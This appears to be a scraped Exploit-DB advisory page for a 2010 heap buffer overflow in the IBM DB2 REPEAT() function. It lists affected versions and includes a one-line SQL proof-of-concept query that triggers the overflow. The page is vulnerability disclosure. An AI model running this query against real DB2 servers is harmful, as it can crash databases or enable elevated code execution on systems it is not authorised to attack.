Lucene search

K
exploitdbEvgeny LegerovEDB-ID:33572
HistoryJan 27, 2010 - 12:00 a.m.

IBM DB2 - 'REPEAT()' Local Heap Buffer Overflow

2010-01-2700:00:00
Evgeny Legerov
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/37976/info

IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.

The issue affects the following:

IBM DB2 versions prior to 9.1 Fix Pack 9
IBM DB2 9.7

Other versions may also be affected. 

SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1 

AI Score

7.4

Confidence

Low